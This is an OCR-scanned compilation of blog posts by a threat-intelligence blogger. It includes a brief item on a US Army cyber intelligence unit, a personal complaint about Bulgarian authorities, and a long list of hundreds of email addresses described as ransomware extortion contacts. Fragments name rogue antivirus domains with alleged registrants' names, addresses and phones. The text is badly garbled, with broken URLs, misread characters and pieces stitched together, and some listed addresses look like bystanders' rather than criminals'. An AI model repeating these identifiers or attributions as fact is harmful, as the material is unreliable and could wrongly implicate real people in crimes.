1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEi7q3MYluJyFi6u4VLgYv9poXLOBCUMQpgbr80_10mACbUxg 
Z3YO0iCTAhnICgO0dN3Ve8 jzrYWZbR53ZMiI2jtRy9zPinTcnR4xEFnP 


. https: //www.theguardian.com/world/2022/mar/23/israel-ukraine-pegasus-spyware-russia 


http: //www.exportctrl.mod.gov.il/Documents/%D7 7,97 “D7 h95h4D7 LAT h20UD7L94%D 7 LA4LD7 LIVUDT LAT LD ThISLDT LOT h20+%, 
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18.3.6 U.S Army Launches the Cyber Military Intelligence Group (CMIG) 
(2022-03-24 11:16) 


[1] 


The U.S Army has recently [2]Jannounced the development and public launch of the Cyber 
Military Intelligence Group (CMIG) which aims to use both proprietary sources including public 
sources on its way to build situational awareness in the world of cyber warfare and malicious 
and fraudulent adversaries. 


An excerpt: 


"The CMIG’s function is to direct, synchronize and coordinate intelligence support to informa- 
tion advantage, cyberspace, information operations and electronic warfare operations." 


Possible use for the newly formed and developed U.S Army cyber military intelligence group 
could possibly include the use of public cyber threat intelligence sources which the group could 
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use to further enrich and properly respond to both using public sources and proprietary and 
possibly sensitive and classified databases. 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiL9j jh418PV1P_Nww8HAw1laJgXSPLBmsDqg3N3TNh-XSLoR 
B8ea8PvHQ1SBp1g37iUN02cmjcAJYKkGvXidX6ReKEaSzSWT34x_aB 


2. bttp://www.army.mil/article/254199/ceremony_officially_affiliates_cyber_military_intelligence_group_with_ 


army_intelligence_and_security_command 


18.3.7 Courtesy of Republic of Bulgaria! - Part Four (2022-03-28 19:41) 


For you there’s no such thing as a link you can click on? Guess what? | won’t tell you. Guess 
what again? The word is this - a basic link which you’re forbidden from clicking on it. It’s called 
the "[1]The Twilight Zone". Good luck in living there and don’t forget to spend the rest of your 
time watching the Outer Limits. You wish! 


[2] 


[3] 


[4] 
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[10] 


Related posts: 

[11]Courtesy of Republic of Bulgaria! - Part Three 

[12]Courtesy of Republic of Bulgaria! - Part Two 

[13]Courtesy of Republic of Bulgaria! 

[14]A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis 


[15]An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law En- 
forcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis 


[16]What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To 
the Almighty Savior! - An Analysis 


[17]Dancho Danchev’s Disappearance - An Elaboration - Part Two 
[18]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 


[19]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Three 


[20]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Two 


[21]Deep from the Trenches in Bulgaria - Part Three 
[22]Deep from the Trenches in Bulgaria - Part Two 
[23]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 


[24]A Profile of a Bulgarian Kidnapper - Pavlin Georgiev (NaBnuH Feoprues/Bacun Moes 
Tayescku/ABop Kones) - An Elaboration on Dancho Danchev’s Disappearance circa 2010 - 
An Analysis 


3. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVVXsEhHf 3w3sh1bCcaaNkmOVp6cHkVDOh1YR£3M7K5bD_CMbQFI£ 
4. https: //ologger .googleusercontent.con/ing/b/R29v22x1 /AVWRaE ja hf TAVOgds ixSi~#EDAKSGaTFFOp0¥eCbzcBa087S0E 
_ https: /ologger .googleusercontent.con/ing/b/R29v22x1 /AVWRsEsyEK IDpRVTESOVakwGptqiiQo8Sz_okDACSnSQVe HIKE 
6. https:/ /blogger.googleusercontent.con/ing//R29v22x1/AVWKsE jae TiLTxO20ur_higutdo Rp sGrOGrBaPrSab7SESgG 
7. jeeps: / ologger .googleusercontent.con/ing/b/R20v22x1 AVvEaE =f YekKooiABLI4A pSEGBSHEOr£9-1CkeZU0DHsrU29 
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0. 
11. https: //ddanchev. blogspot .com/2022/03/courtesy-of-republic-of-bulgaria-part_20.htm 

12. 

13. 


14. https: //ddanchev. blogspot .com/2022/02/a-profile-of-bulgarian-dipshit-and.htm 


ee 
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15. https: //ddanchev. blogspot . com/2022/01/an-update- on-my-disappearance-and.htm 


16. https://ddanchev. blogspot .com/2021/12/what- you- get-from-peasant-aria-land-new.htm 


17. https: //ddanchev. blogspot .com/2019/04/dancho-danchevs-2010-disappearance.htm 


18. 
19, 
20. 
21. 


22. https://ddanchev.blogspot . com/2021/09/deep-from-trenches-in-bulgaria-part-two.htm 


23. https://ddanchev.blogspot . com/2020/12/how- i-got-robbed-and-beaten-and.htm 


24. https://ddanchev.blogspot .com/2021/11/a-profile-of-bulgarian-kidnapper-pavlin. htm 


18.3.8 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Five (2022-03-29 04:13) 


ccc cockCOM 


I’ve decided to continue the "[2]Profiling a Currently Active High-Profile Cybercriminals Portfolio 
of Ransomware-Themed Extortion Email Addresses - Part Four" blog post series and I’ve decided 
to issue yet another update in terms of currently active ransomware themed personal email 
address accounts. 


Sample list of currently active ransomware themed email address accounts includes: 
restorealldata@firemail.cc 

gorentos@bitmessage.ch 

decryptex@airmail.cc 


recoverydata52@protonmail.com 
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biden@cock.li 
info@anti-spyware-101.com 
helpmanager@mail.ch 
restoremanager@airmail.cc 
Hiden _pro@aol.com 

Hiden _pro@tutanota.com 
LLTP@mail2tor.com 
contatomaktub@email.tg 
Legioner_seven@aol.com 
Recuperadados@protonmail.com 
bitcoinl43@india.com 
mosteros@firemail.cc 
restorefiles@firemail.cc 
votrnb@gmail.com 
mr.black@disroot.org 
newexploit@tutanota.com 
Veracrypt@foxmail.com 
qar48@tutanota.com 
unCrypte@outlook.com 
decodevoid@gmail.com 
docodepepe@gmail.com 
petersburgrecover@protonmail.com 
jacklee@airmail.cc 
jacklee73@mail.ua 
b1itcOln@aol.com 
decryptbox@airmail.cc 
Folieloi@protonmail.com 
Ctorsenoria@tutanota.com 
lillysoft.it@gmail.com 
Fud@india.com 
Alex.vlasov@aol.com 
Diablo diablo2@aol.com 
Restore@protonmail.ch 
Catsexy@protonmail.com 


Guardware@india.com 


20809 


Systemdown@india.com 
Milarepa.lotos@aol.com 
Sitaram108@india.com 
GruzinRussian@aol.com 
Ncrypt@cock.li 
Xbotcode@gmail.com 
Meldonii@india.com 
amagnus@india.com 
Hairullah@inbox.|v 
Gerkaman@aol.com 
Matrix9643@yahoo.com 
slaker@india.com 

Space _rangers@aol.com 
Sos@anointernet.com 
ihurricane@sigaint.org 
Drugvokrug727@india.com 
Help@decryptservice.info 
Grand _car@aol.com 
Batman _good@aol.com 
Decryptallfiles3@india.com 
mkgoro@india.com 
Savepanda@india.com 
Cocoslim98@gmail.com 
fixfiles@protonmail.ch 
Bitcoinpay@india.com 
Masterlock@india.com 
Cyber baba2@aol.com 
Siddhiup2@india.com 
Mich78@usa.com 
Raa-consultl1@keemail.me 
Lavandos@dr.com 
Calipso.god@aol.com 
hnumkhotep@india.com 
Mailrepa.lotos@aol.com 
rescuers@india.com 
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avastvirusinfo@yandex.com 
garryweber@protonmail.ch 
Love.server@mail.ru 
Okean-1955@india.com 
Ramachandra7@india.com 
Decipher@keemail.me 
File-help@india.com 
Makdonalds@india.com 
Supermagnet@india.com 
Last centurion@aol.com 
haizenberg@aol.com 
Doctor@freelinuxmail.org 
Suppteam01@india.com 
Supportfriend@india.com 
Radxlove7@india.com 
Happydayz@india.com 
black.world@tuta.io 
Seven _legion@aol.com 
Ninja _gaiver@aol.com 
safeanonym14@sigaint.org 
fantomd12@yandex.ru 
Age _empires@india.com 
Help _you@india.com 
DIGITALKEY@163.com 
SharkO1@msgden.com 
Helpme@freespeechmail.org 
Grapn206@india.com 
wyna@nyu.edu 
Suppteam03@india.com 
assistant@bitmessage.ch 
youneedmail@protonmail.com 
Thedon78@mail.com 
Orgasm@india.com 
Decryptutility@protonmail.com 
Ceril33@india.com 
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A _Princ@aol.com 
Decryptallfiles@india.com 
Melme@india.com 
helpmeonce@mail.ru 
Bitcoinrush@imail.com 
webmafia@asia.com 
Nomoneynohoney@india.com 
Blacknord@tutanota.com 
Helper023@cock.li 
partytime123@default.rs 
Recoverfiles2017@qq.com 
GuardBTC@cock.|i 
Wisperado@india.com 
jonskuper578@india.com 
Decrypthelp@qq.com 
MerlinStusan@protonmail.com 
Decrypthelp@qq.co 
MildredRLewis@teleworm.us 
systems@tutanota.com 
xzet@tutanota.com 
Payfornature@india.com 
szem@tutanota.com 
Peekabooo@qq.com 

help _911 support@rambler.ru 
help@tutanota.com 
Szems@tutanota.com 
Tizer78224@india.com 
Tizer77234@protonmail.com 
recfiles@protonmail.com 
Patagonoa92@tutanota.com 
Worldcry@cock.li 
Opencode@india.com 
Hellstaff@india.com 
mr.dec@tutanota.com 


mr.dec@protonmail.com 
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City: Sgo Paulo 
Province/state: NA 

Country: BR 

Postal Code: 01323 

Phone: +5.5113245388 
Fax: +5.5113245388 

Email: victor@aennovas.com 


® Antivirus 2009 a ee 


A DANGER! Sfissceri youn PC UP TO-DAT 


Optimize and protect your system with advanced antivirus technology 
Before you regater this program, please read the fobowing caretuy: click Here! 
i , = ae ave an exctunive 40% discount, » 
— = 
=o i-ae & 


rapidantiviruspcscan .com (78.46.216.237) 
securedserverdownload .com 
securedonlinewebspace .com 
securedupdateupdatesoftware .com 
bestantivirusdefense .com 
live-pc-antivirus-scan .com 
best-antivirus-protection .com 
proantivirusprotection .com 
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recoveryl@writeme.com 
gardengarden@cock.|i 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
brbrcodes@gmail.com 
datastore2018@mail.ru 
f1220@tuta.io 


sebastiennolet92@gmail.com 


castor-troy-restore@protonmail.com 


petropasevich@aol.com 
blacklist@clock.li 
Blacklist@cock.li 


Mammon-decrypt@protonmail.com 


Stopencrypt@qq.com 

Light Yagami@tuta.io 
backtonormal@foxmail.com 
decryptgarranty@airmail.cc 
Pumarestore@india.com 
lolitahelp@cock.li 
wewillhelp@airmail.cc 
wayneevenson@protonmail.com 
Stevenseagal@airmail.cc 
Cyberwars@qq.com 
yoursalvations@protonmail.ch 
Grizzly@airmail.cc 
incongnitoman@protonmail.com 
InkognitoMan@tutamail.com 
ru9944@yandex.ru 
btcdecripter@qq.com 

Santa _helper@protonmail.com 
deathransom@ainmail.cc 
ponce.lorena@aol.com 
waiting@bitmessage.ch 
jundmd@cock.li 


oovro@aol.com 
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traher@dr.com 

my _service@scryptmail.com 
Supportdecrypt@firemail.cc 
unlockdata@foxmail.com 
Merosa@india.com 
Mrpeterson@cock.li 

restore service99@scryptmail.com 
Bitcharity@protonmail.com.com 
F-data@protonmail.com 
audrey.b@aol.com 
Lockhelp@qq.com 
decryptxxx@protonmail.com 
help557@gmx.de 
payday@tfwno.gf.ht 
cybergroup1@aol.com 
estemaniii@airmail.cc 
Decryptbots@cock.li 
checkcheck07@qq.com 
nmode@tutanota.com 
Mespinoza980@protonmail.com 
daves.smith@aol.com 
Datahelp@iran.ir 
Datarestorehelp@firemail.cc 
Gorentos2@firemail.cc 
MerlinWebster@aol.com.com 
Billwong73@yahoo.com 
Honeylock@cock.li 
Bitdefender2020@cock.|i 
cyberunion@tuta.io.cu 
backinfo@protonmail.com 
rdpconnect@protonmail.com 
cyberunion@tuta.io 
doctor777@mail.fr 
tomascry@protonmail.com 
assonmolly5@gmail.com 
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loybranunun1975@protonmail.com 


cl _crypt@aol.com.cl 
akzhq808@tutanota.com.ma 
noreply@blogger.com 


Salesrestoresoftware@firemail.cc 


Salesrestoresoftware@gmail.com 


regem _regum@aol.com.onion 
123@tutanota.com 
crab7765@gmx.de 
che808@protonmail.com 
bkp@cock.li 


nikolateslaproton@protonmail.com 


decoder-help@protonmail.com 
x _mister@aol.com 
Bitlocker@foxmail.com 
Admincrypt@protonmail.com 
Gerentoshelp@firemail.cc 
Cryptocash@aol.co 
acryhjccbb@protonmail.com 
Unlocksupp@airmail.cc 
look1213@protonmail.com 
actum _signum@aol.com 
Black.mirror@qq.com 
Brcode2017@gmail.com 
Serverdrona@gmail.com 
Anony.killers@protonmail.com 
Decoder@keemail.me 
Zip@email.tg 
Colecyrus@mail.com 
pepsicola@femconc.com 
Support@decrypt.ws 
restorel19@cock.li 

mmm _reborn@tutamail.com 
skynet45@tutanota.com 
Leab@tuta.io 
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Insane@airmail.cc 
Devicerestore@india.com 
r3vo@protonmail.com 
Unickr@protonmail.com 
MerlinVelso@protonmail.com 
Cho.dambler@yandex.com 
email-byaki buki@aol.com 
decryptorsoon301@aol.com 
Fast Decrypt and _Protect@Tutanota.com 
_ _murzik@jabber.mipt.ru 
Helps@tutanota.com 
Murzik@jabber.mipt.ru 
Dec999@cock.li 
ThomasRaymond@protonmail.com 
CyberSCCP@protonmail.com 
Info@fugunator.de 
superuser111@OnllLne.at 
getdataback@fros.cc 
help@decrypt-files.info 
Darknes@420blaze. it 
yourhope@airmail.cc 

Kurosaki ichigo@tutanota.com 
help@decrypt-files.in 
Goodjob24@foxmail.com 
Decryptor@cock.li 
decyourdata@protonmail.com 
pausa@bitmessage.ch 
sebekgrime@tutanota.com 
NastasyaTurkina68@mail.ru 
seed@firemail.cc 
AiDcrypt@tutanota.com 
Helper@tfwno.gf 
helperx@tuta.io 
bufalo@firemail.cc 

crypted luedtkis@feudtory.com 
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3442516480@qq.com 
Sambolero@tutanoa.com 
Mrcrypting@airmail.cc 
Admin@decryption. biz 
goodencrypt88@gmail.com 
backdata.company@aol.com 
fiasco911@protonmail.com 


_infectionplex@cock.li 


cashdashsentme@protonmail.com 


ezequielanthon@aol.co 
Tchukopchu@tutanota.com 
webmaster@pcthreat.com 
blackingdom@gszmail.com 
insupport@messagesafe.io 
admin@stelsdatas.com 


chinarecoverycompany@cock.li 


chinarecoverycompany@airmail.cc 


potentialenergy@mail.ru 
securityitl23@protonmail.com 
cavefat@tuta.io 
ripntfs@protonmail.com 
wecanhelpu@tuta.io 
support@sysmail.ch 
helprestoremanager@airmail.cc 
mtx88@onionmail.org 
ciphercrypt@tuta.io 
JimThompson@ctemplar.com 
didoh@tutanota.com 
needhelp@disroot.org 
seawolf@onionmail.org 
keychild@onionmail.org 
detectOr@tuta.io 
charlieAdmin@mail2tor.com 
nomad.crypt@onionmail.org 


ghostdog@onionmail.org 
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6ix9@asia.com 
yourfiles1@cock.li 
cOv1d19@job4u.com 
bidencrypt@onionmail.org 
todecrypt@disroot.org 
cryptodancer@onionmail.org 
everyday@dr.com 
tiocapvbu@aol.com 
python100@tutanota.com 
datos@onionmail.org 
projectblack@criptext.com 
nomanscrypt@tuta.io 
zeusl@msgsafe.io 
khfsuca@protonmail.com 
bebenrowan@aol.com 
xcsset@criptext.com 
cryptoncrypt@tuta.io 
partydog@msgsafe.io 
delta@onionmail.org 
rdphack@onionmail.org 
getdecrypt@disroot.org 
yasomoto@tutanota.com 
Golbnaty@Aol.com 
datahlp@tuta.io 
dagsdruyt@onionmail.org 
hpjar@keemail.me 
donald888@mail.fr 
catapultacrypt@tuta.io 
godecrypt@onionmail.org 
badhach@aol.com 
lizardcrypt@tuta.io 
filerecovery@zimbabwe.su 
brokendig@zimbabwe.su 
dokulus@tutanota.com 
embog@firemail.cc 
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jessymail26@aol.com 
oral@tuta.io 
necurs@aol.com 
coleman2021@aol.com 
rassupport@cock.li 
carbanak@aol.com 
backup24@msgsafe.io 
vm1liqzi@aol.com 
paymei@cock.li 
helpdecrypt@msgsafe.io 
con3003@msgsafe.io 
btcl1@gmx.com 
dable19@mail.fr 
tomlee240@aol.com 
avaaddams@msgsafe.io 
22btc@tuta.io 
axitrun2@tutanota.com 
leeza@keemail.me 
decrypt@disroot.org 
crypthub@tuta.io 
astra2eneca@aol.com 
axitrun@cock.li 
decrypt2021@aol.com 
buydecrypt@qq.com 
hlper4y@tutanota.com 
getacrypt@tuta.io 
21btc@cock.li 
gonald58@cock.|i 
pexdatax@gmail.com 
kjingx@tuta.io 
worldsnake@cock.|i 
eusa@tuta.io 
patrikOO8@tutanota.com 
zinnik321@cock.| 
m5b92n5p1@mail.com 
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backup@zimbabwe.su 
linas89@aol.com 
james2020m@aol.com 
debri@keemail.me 
backup@zimbabawe.su 
elvisdark@aol.com 
kuk1@tuta.io 
yourfiles1@tuta.io 
blackhat@iname.com 
259461356@qq.com 
decrypt@msgsafe.io 
triplock@tutanota.com 
getscoin3@protonmail.com 
decrypt@null.net 
decrypttme@airmail.cc 
technopc@tuta.io 
lpe-cve@usa.com 
freshkart@420blaze. it 
biashabtc@redchan. it 
databack44@tuta.io 
linajamser@aol.com 
aihlp24@tuta.io 
blacklivesmatter@qq.com 
decrypt@europe.com 
zphc@cock.li 
datahelp@techmail.info 
goldmind@tuta.io 
pashmak@tutanota.com 
newhelper@cock.li 
savemyselfl@tutanota.com 
cl _crypt@aol.com 
newhelper24@protonmail.ch 
yyuzhou13@tutanota.com 
enabledecrypt@aol.com 


smithlL@mailfence.com 
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backdata@zimbabwe.su 
xatixxatix@mail.fr 
getscoin2@protonmail.com 
gocrypt@aol.com 
week1@tuta.io 
logan8833@aol.com 
trfgklmbvzx@aol.com 
tcprx@tutanota.com 
pvphlp@tutanota.com 
zagrec@protonmail.com 
de.crypt@aol.com 
homersimpson777@mail.fr 
geniusid@protonmail.ch 
crimecrypt@aol.com 
nullcipher@cock.li 
felix@countermail.com 
teamvv@protonmail.com 
pain@onefinedstay.com 
ucos2@elude.in 
databack2@protonmail.com 
resetboot@aol.com 
prndssdnrp@mail.fr 
gygabot@cock.li 
newhelper@protonmail.ch 
how _decrypt@aol.com 
Ixhlp@protonmail.com 
teamvi@protonmail.com 
savebase@aol.com 
r3ad4@aol.com 
hlpp@protonmail.ch 
recovery@qbmail.biz 
dr.decrypt@aol.com 
openpgp@foxmail.com 
admin@steldatas.com 
mewellwisher@protonmail.ch 
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mail@qbmail.biz 
onepconebtc@protonmail.com 
bit decrypt@protonmail.com 
paybit@aol.com 
im.online@aol.com 
dayonpay@aol.com 
CCD-help@protonmail.ch 
decoding@qbmail.biz 
bitcoin@email.tg 
supermetasploit@aol.com 
brokenbrow.teodorico@aol.com 
decrypt2021@elude.in 
btckeys@aol.com 
coronavirus@foxmail.com 
help.crypt@aol.com 
grandtheftfiles@aol.com 
back _data@foxmail.com 
smithhelp@mail.ee 
dryidik@tutanota.com 
decrypt@qbmail.biz 
black@gytmail.com 
coronavirus@qq.com 
help.me24@protonmail.com 
mr.crypteur@protonmail.com 
1024back@tuta.io 
new2crypt@aol.com 
qq1935@mail.fr 
supp37@cock.li 
cryptlive@aol.com 
notgoodnews@tutanota.com 
sumpterzoila@aol.com 
recoverysq|@protonmail.com 
anna.kurtz@protonmail.com 
whitwellpark@aol.com 


MerlinWebster@aol.com 
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best-anti-virus-scanner .com 
best-antivirus-scanner .com 
bestantivirusproscanner .com 
bestantivirusfastscanner .com 
protectedsystemupdates .com 
liveantispywarescan .com 
live-antispyware-scan .com 
internet-antispyware-scan .com 


Domain owner: 

Vadim Selin anzo45@freebbmail.com 
+ 74952783432 fax: +74952783432 
ul. Vorobieva 98-34 

Moskva Moskovskay oblast 127129 
ru 


antivirus-scan-your-pc .com (75.126.175.232; 209.160.21.126) 
bestantivirusdefence .com 

best-antivirus-defense .com 

premiumadvancedscan .com 

bestantivirusproscan .com 

best-antivirus-pro-scanner .com 

internetprotectedpayments .com 


Domain owner: 

Name: Nikolai V Chernikov 

Address: yl. Kravchenko 4 korp. 2 kv.17 
City: Moskva 

Province/state: NA 

Country: RU 

Postal Code: 119334 

Email: promasteryouth@gmail.com 
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manyfiles@aol.com 
admin@spacedatas.com 
agent.dmr@protonmail.com 
returnmefiles@aol.com 
asdbtc@aol.com 
moncler@cock.li 
corebitp@cock.li 
imdecrypt@aol.com 
admin@stex777.com 
Lbtc@qbmail.biz 


admin@sectex.net 


keysfordencryption@airmail.cc 


decrypt@files.mn 
teammarcy1l0@cock.li 
decrypt2020@aol.com 
ninja777@cock.li 
clifieb@tutanota.com 
rsacrypt@aol.com 
amandacerny89@aol.com 
blackmax@tutanota.com 
cryptocash@aol.com 
painplain98@protonmail.com 
vivaldicrypt@outlook.com 
locksvbox@tutamail.com 
Kixonw@gmail.com 
kixonw@tutanota.com 
askhelp@protonmail.com 
askhelp@tutanota.com 
askhelp@india.com 
Decrypt8070@gmail.com 
legalrestore@airmail.cc 
masterlrestore@cock.|li 
unlock@tfwno.gf 
factfullOLO3@airmail.cc 


unknownteam@criptext.com 
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paolop@hotmail. it 
veritablebee@protonmail.ch 
barboza40@yahoo.com 
barboza40@tutanota.com 
elantra@galeiim.com 
baseusO906@goat:.si 
pecunia0318@tutanota.com 
pecunia0318@goat.si 
BobGant82@criptext.com 
blackheel@protonmail.com 
datarecovery13nc3@protonmail.com 
btcontact@protonmail.com 
decryptioner@airmail.cc 
cryptonation92@outlook.com 
code1024@keemail.me 
neftet@tutanota.com 
EpsilonCrypt@tutanota.com 
icq-is-firefox20@ctemplar.com 
pecunia0318@airmail.cc 
telegramfirefox2029@protonmail.com 
harmagedon0707@airmail.cc 
pecunia0318@protonmail.ch 
hinduism0720@tutanota.com 
xdatarecovery@msgsafe.io 
xdatarecovery@mail.com 
mammon0503@tutanota.com 
ammon0503@tutanota.com 
mammon0503@protonmail.com 
samsung00700@tutanota.com 
toddmhickey@outlook.com 
jamiepenkaty@cock.li 
KOK8@protonmail.com 
markusdoc88@criptext.com 
PabFox@protonmail.com 
Deus69@criptext.com 
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Deus69@cock.li 
Deus69@tuta.io 
MorganBel23@yahoo.com 
MaryaLawra26@gmail.com 
ForestMem33@aol.com 
Jack76Duran@aol.com 
Jack76Duran@yahoo.com 
Jack76Duran@protonmail.com 
HydaHelp1@tutanota.com 
HydraHelp1@protonmail.com 
klowershit1835@tutanota.com 


RemotePChelper@protonmail.com 


Recoverybat@protonmail.com 
Recoverybat@cock.li 
retrnyoufiles23@tutanota.com 
John32Dillinger@seznam.cz 
clyde.barrow15@tutanota.com 
manager@mailtemp.ch 
666lilium666@gmail.com 
Brilliancebk@protonmail.com 
Deccoder431@protonmail.com 
Decrpt@tutanota.com 
Decrptoffice@gmail.com 
Encryptc4@elude.in 
Encrypt4u@tutanota.com 
Ftworksergey@gmail.com 
Gregoryluton021021@gmail.com 
Helpsdec@tutanota.com 
Lizardbkup@protonmail.com 
Sleepme134@gmail.com 
Soportevoid@tutanota.com 
Supportvoid@elude.in 
Unlockdata@criptext.com 
Usdatadecrypt@gmail.com 
Xtredboy@protonmail.com 
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Open _file@tutanota.com 
RansomwareSupport@zohomail.com 
openthefile@mailfence.com 
Loberoper@gmail.com 
hoti2Z020@tutanota.com 
wixawm@gmail.com 

Hushange _delbar@outlook.com 
AppleRansomware1024@tutanota.com 
openthefile@tutanota.com 
dexter.xanax@tutanota.com 
noitanimodd@gmail.com 
temloown@tuta.io 
arenono@protonmail.com 
monito001@aol.com 
getthekey@tutanota.com 
medusabtc@protonmail.com 
udachal23@mail2tor.com 
payfast500@mail2tor.com 
rootiunik@cock.li 
TimothyCrabtree@protonmail.com 
angry _war@protonmail.ch 
cheetOs de@protonmail.com 
Pringls us@protonmail.com 
helpservis@horsefucker.org 
zeppelindecrypt@420blaze.it 
zeppelin helper@tuta.io 
zeppelin decrypt@xmpp.jp 
keychild@protonmail.com 
sammy/70p _y61p@buxod.com 
cipherc@onionmail.org 
managerhelper@airmail.cc 
cyberwar4@rambler.ru 
jackrasal@privatemail.com 
dts1024@tutanota.com 
dts1024@onionmail.org 
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restoremanager@firemail.cc 
joshua.mabelin@gmail.com 


vengisto@firemail.cc 


email-rahuldeeprastogi@gmail.com 


helpteam@mail.ch 
helpmanager@airmail.cc 
mudinuton@gmail.com 
abka1001@gmail.com 
supporthelp@airmail.cc 
FilesRecoverEN@gmail.com 
xll|@imap.cc 
pedarsaggg@onionmail.org 
seamoon@tutanota.com 
deltapaymentbitcoin@gmail.com 
mtx88@reddithub.com 
fastnas@fea.st 
gds134s@mm.st 
greenlite@keemail.me 
fnkloiuyscx@mailite.com 
doyouhaveaproblem@cock.li 
icansolveit@protonmail.com 
starcomp@keemail.me 
azer1115@goat.si 
helpdatarestore@firemail.cc 
sandeepl.medikonda@gmail.com 
decryptfiles33@cock.li 
Wingate@onionmail.org 
death@cumallover.me 
seawolf@msgsafe.io 
nbarboza40@yahoo.com 
nbarboza40@tutanota.com 
nRecoverybat@protonmail.com 
nhelpmanager@mail.ch 
nhelpdatarestore@firemail.cc 
nklowershit1835@tutanota.com 
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nhelpteam@mail.ch 
nhelpmanager@airmail.cc 
npayfast500@mail2tor.com 
nDeus69@criptext.com 
nDeus69@cock.li 
nDeus69@tuta.io 
tHydaHelp1@tutanota.com 
nHydaHelp1@tutanota.com 
nHydraHelp1@protonmail.com 
tnoitanimodd@gmail.com 
nmanager@mailtemp.ch 
nmanagerhelper@airmail.cc 
nhelprestoremanager@airmail.cc 
decryptionx@onionmail.org 
nrestoremanager@firemail.cc 
nsupport@sysmail.ch 
nretrnyoufiles23@tutanota.com 
nEpsilonCrypt@tutanota.com 
nAskHelp@protonmail.com 
nAskHelp@tutanota.com 
nAskHelp@india.com 
ForDecrypte@mailfence.com 
addressesupcr@protonmail.com 
juanjoorodriguez@protonmail.com 
juanjo.rodriguez@tutanota.com 
codemanager@fastmail.fm 
repairmyfile@tormail.org 
antispam@cyberservices.com 
security11220@gmail.com 
bracode1l7@gmail.com 
sec222555@gmail.com 
allhelpl16@gmail.com 
auinfol6@gmail.com 
helpasial6@gmail.com 
lathelp16@gmail.com 
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brcodes16@gmail.com 
brcodes17@gmail.com 
brainfol7@gmail.com 
uscodes17@gmail.com 
eucodes17@gmail.com 
codescodes18@gmail.com 
cryptosupport@tormail.net 
blocksupport@tormail.net 
thel024rsa@i2pmail.org 
decrypting-files@yandex.ru 
decrypting@tormail.org 
blockage@tormail.org 


beryukov.mikuil@gmail.com 


torchwood0000@yandex.com 


torchwood@66.ru 
torchwood@riseup.net 
encfilesos@aol.com 
help@ausi.com 
sos@ausi.com 

anna _stepanova@aol.com 
backspace@riseup.net 
byaki buki@aol.com 
contact@casinomtgox.com 
evromaidan2014@aol.com 
Heinz@oath.com 
iizomer@aol.com 
kolobocheg@aol.com 
moshiax@aol.com 
numlock@2riseup.net 
numlock@riseup.net 
oduvansh@aol.com 
starpex@riseup.net 
ZANZIBAR@umpire.com 
vorjdsa@mail.ru 


Opensupport@india.com 
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supercrypt@mailer9.com 
plaguel7@riseup.net 
xrtnhelp@yandex.ru 
silasw9pa@yahoo.co.uk 
decryptor171@mail2tor.com 
decryptor171@scramble.io 
filesO00001@gmail.com 
decode00001@gmail.com 
decode00002@gmail.com 
decode77777@gmail.com 
decode99999@gmail.com 
files640@gmail.com 
Ryabinina.Lina@gmail.com 
ViladimirScherbinin1991@gmail.com 
Lukyan.Sazonov26@gmail.com 
Novikov.Vavila@gmail.com 
selenadymond@gmail.com 
gervasiy.menyaev@gmail.com 
RobertaMacDonald1994@gmail.com 
pilotpilotO88@gmail.com 
europay@india.com 
fudx@lycos.com 

fud@lycos.com 
decode@india.com 
decrypt@india.com 
info@cryptedfiles. biz 
salutem@protonmail.com 
bingo@opensourcemail.org 
johndoe@weekendwarrior55.com 
av666@weekendwarrior55.com 
email _info@cryptedfiles.biz 
emaill _info@cryptedfiles.biz 
test.jpg.id-1235240425 help@decryptservice.info 
kiaracript@email.cz 


kiaracript@gmail.com 
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-kiaracript@gmail.com 


archive2010.zip.SN-6633475505259148-kiaracript@gmail.com 
archive2014.rar.SN-6633475505259148-kiaracript@gmail.com 
documentz2.txt.SN-6862051502902366-kiaracript@gmail.com 


y.volkova@i-jazz.ru 
kirova.|!@mutualizm.ru 
kirova.Is@orangedv.tmweb.ru 
kirova-l@wibor5.ru 
abramova.|@wibor5.ru 
abramova@sabona.ru 
|_abramova@festivalps.ru 

| _abramova@wibor5.ru 


tox@sigaint.org 


theonewhoknocks6969@mailinator.com 


yagababushka@yahoo.com 
yaga.babushka@yahoo.com 
sociopatii@yahoo.com 
cagel@gmx.us 
datebatut@gmail.com 
datebatut@pochta.com 
davidblainemagique@gmail.com 
davidblaine@mail2world.com 
bitlockerlock.unlock@gmail.com 
unlock.locked.bitlocker@gmail.com 
comodosec@yandex.com 
comodosec@india.com 
vuyrk568gou@lelantos.org 
myqjsOl@gmail.com 
wowaanne@mail.ru 
viper1990@safe-mail.net 
keybtc@inbox.com 
mvplocksvc@yahoo.com 
xorthelp@yandex.ru 
trunhelp@yandex.ru 


helplovx@excite.co.jp 
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paycrypt@aol.com 
paycrypt@india.com 
-paycrypt@aol.com 
maliko@inbox.Iv 
locked@vistomail.com 
tuyuljahat@hotmail.com 
lyiegQ9eB@secmail.pro 
tikitakbum@rambler.ru 
thorntitinil979@danwin1210.me 
postal.surgut@danwin1210.me 
dizelmon@danwin1210.me 
eed8Aeta@danwin1210.me 
chaiRo7u@danwin1210.me 
eR8iech5@danwin1210.me 
Ux30e7ae@secmail.pro 
Xieth8ie@secmail.pro 
ghjujy@tuta.io 
Aeghie6u@secmail.pro 
rekoh4th@secmail.pro 
uroo7ohM@secmail.pro 
ivanmalahov@protonmail.com 
ooosferaplus@protonmail.com 
rusoftfond@protonmail.com 
andrey.taranov@protonmail.com 
g.kulahmet@protonmail.com 
g.kulahmet@secmail.pro 
soft.russian@protonmail.com 
soft.russian@secmail.pro 
mishacat@cock.li 
mishacat@secmail.pro 
bichkova@cock.li 
bichkova@secmail.pro 
vankosa@secmail.pro 
roterbro@cock.li 


roterbro@secmail.pro 
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Your Purchase is Backed By Fully Secure & Encrypted L, _Your Email Address and 
